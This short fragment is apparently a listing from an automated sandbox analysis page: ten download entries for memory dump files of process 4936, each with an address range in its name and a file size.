Download
memory/4936-231-0x0000000073650000-0x0000000073E00000-memory.dmp

Filesize
7.7MB

Download
memory/4936-1153-0x0000000007C60000-0x0000000007C7A000-memory.dmp

Filesize
104KB

Download
memory/4936-1164-0x0000000007CD0000-0x0000000007CDA000-memory.dmp

Filesize
40KB

Download
memory/4936-1174-0x0000000007EF0000-0x0000000007F86000-memory.dmp

Filesize
600KB

Download
memory/4936-1175-0x0000000007E60000-0x0000000007E71000-memory.dmp

Filesize
68KB

Download
memory/4936-1185-0x0000000073650000-0x0000000073E00000-memory.dmp

Filesize
7.7MB

Download
memory/4936-1182-0x0000000007EE0000-0x0000000007EE8000-memory.dmp

Filesize
32KB

Download
memory/4936-1181-0x0000000007F90000-0x0000000007FAA000-memory.dmp

Filesize
104KB

Download
memory/4936-5-0x000000007365E000-0x000000007365F000-memory.dmp

Filesize
4KB

Download
memory/4936-1177-0x0000000007EB0000-0x0000000007EC4000-memory.dmp

Filesize
80KB

Download